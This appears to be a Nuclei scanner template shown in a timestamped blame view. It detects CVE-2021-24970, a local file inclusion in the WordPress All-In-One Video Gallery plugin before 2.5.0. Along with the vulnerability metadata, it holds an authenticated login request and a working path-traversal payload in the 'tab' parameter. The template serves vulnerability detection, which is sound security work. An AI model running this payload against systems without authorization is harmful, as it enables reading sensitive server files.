2023-03-19 14:44:56 +00:00
id : CVE-2021-24970
2023-03-18 22:07:09 +00:00
info :
2023-03-28 19:16:54 +00:00
name : WordPress All-In-One Video Gallery <2.5.0 - Local File Inclusion
2023-03-18 22:07:09 +00:00
author : r3Y3r53
severity : high
description : |
2023-03-28 20:46:20 +00:00
WordPress All-in-One Video Gallery plugin before 2.5.0 is susceptible to local file inclusion. The plugin does not sanitize and validate the tab parameter before using it in a require statement in the admin dashboard. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations.
2023-09-27 15:51:13 +00:00
impact : |
An attacker can exploit this vulnerability to read sensitive files on the server, potentially leading to unauthorized access or information disclosure.
2023-09-06 12:09:01 +00:00
remediation : Fixed in version 2.5.4.
2023-03-18 22:07:09 +00:00
reference :
- https://wpscan.com/vulnerability/9b15d47e-43b6-49a8-b2c3-b99c92101e10
- https://wordpress.org/plugins/all-in-one-video-gallery
- https://nvd.nist.gov/vuln/detail/CVE-2021-24970
classification :
2023-03-20 07:05:15 +00:00
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
cvss-score : 7.2
2023-03-18 22:07:09 +00:00
cve-id : CVE-2021-24970
2023-03-20 07:05:15 +00:00
cwe-id : CWE-22
2023-10-14 11:27:55 +00:00
epss-score : 0.03639
2024-01-14 13:49:27 +00:00
epss-percentile : 0.90767
2023-09-06 12:09:01 +00:00
cpe : cpe:2.3:a:plugins360:all-in-one_video_gallery:*:*:*:*:*:wordpress:*:*
2023-03-18 22:07:09 +00:00
metadata :
2023-06-04 08:13:42 +00:00
verified : true
2023-09-06 12:09:01 +00:00
max-request : 2
2023-07-11 19:49:27 +00:00
vendor : plugins360
product : all-in-one_video_gallery
2023-09-06 12:09:01 +00:00
framework : wordpress
2024-01-14 09:21:50 +00:00
tags : cve2021,cve,wpscan,wp,wp-plugin,wordpress,lfi,authenticated,plugins360
2023-03-18 22:07:09 +00:00
2023-04-27 04:28:59 +00:00
http :
2023-03-18 22:07:09 +00:00
- raw :
- |
POST /wp-login.php HTTP/1.1
Host : {{Hostname}}
Content-Type : application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
- |
GET /wp-admin/admin.php?page=all-in-one-video-gallery&tab=..%2F..%2F..%2F..%2F..%2Findex HTTP/1.1
Host : {{Hostname}}
matchers :
- type : dsl
dsl :
- 'status_code_2 == 200'
- 'contains(content_type_2, "text/html")'
- 'contains(body_2, "All-in-One Video Gallery")'
- 'contains(body_2, "Hello world!")'
- 'contains(body_2, "Welcome to WordPress")'
condition : and
2024-01-26 08:31:11 +00:00
# digest: 4a0a00473045022100b5d1766bc6648351452ccabff49a901fdcee3d82c63473eb3f7da8360ad1a0f802201b2b426c71f82735e56341c6b3a49558a74a3e6d0a936e46a2d1c375a0d2dffc:922c64590222798bb761d5b6d8e72950